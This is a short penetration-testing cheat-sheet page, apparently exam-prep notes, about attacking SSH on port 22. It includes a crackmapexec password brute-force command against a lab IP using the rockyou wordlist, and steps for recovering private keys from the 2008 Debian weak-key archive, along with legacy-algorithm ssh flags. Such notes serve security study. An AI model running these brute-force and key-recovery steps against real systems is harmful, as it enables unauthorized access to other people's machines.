ssh 22

ssh 22

  • ************************************************************Bruteforcing credentials using crackmapexec ssh 10.11.1.251 -u <user> -p /usr/share/wordlists/rockyou.txt

  • If machine is running on very old linux , and in 2008 , ssh public and private keys are publically available . since authorized_key has public key , it can be used to find private key

    • git clone https://github.com/g0tmi1k/debian-ssh

    • cd debian-ssh/common_keys/

    • tar -vjxf debian_ssh_dsa_1024_x86.tar.bz2

    • cd dsa/1024

    • grep -lr “<20 charac from authorizedkey>”

    • got private key

  • if there is any error try

    • configure /etc/ssh/ssh_config

      • add line in the end PubkeyAcceptedKeyTypes +ssh-dss

    • use arguments like this with ssh command if there is any error -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss

PreviousSMTP 25 EnumerationNextms-sql 1433

Last updated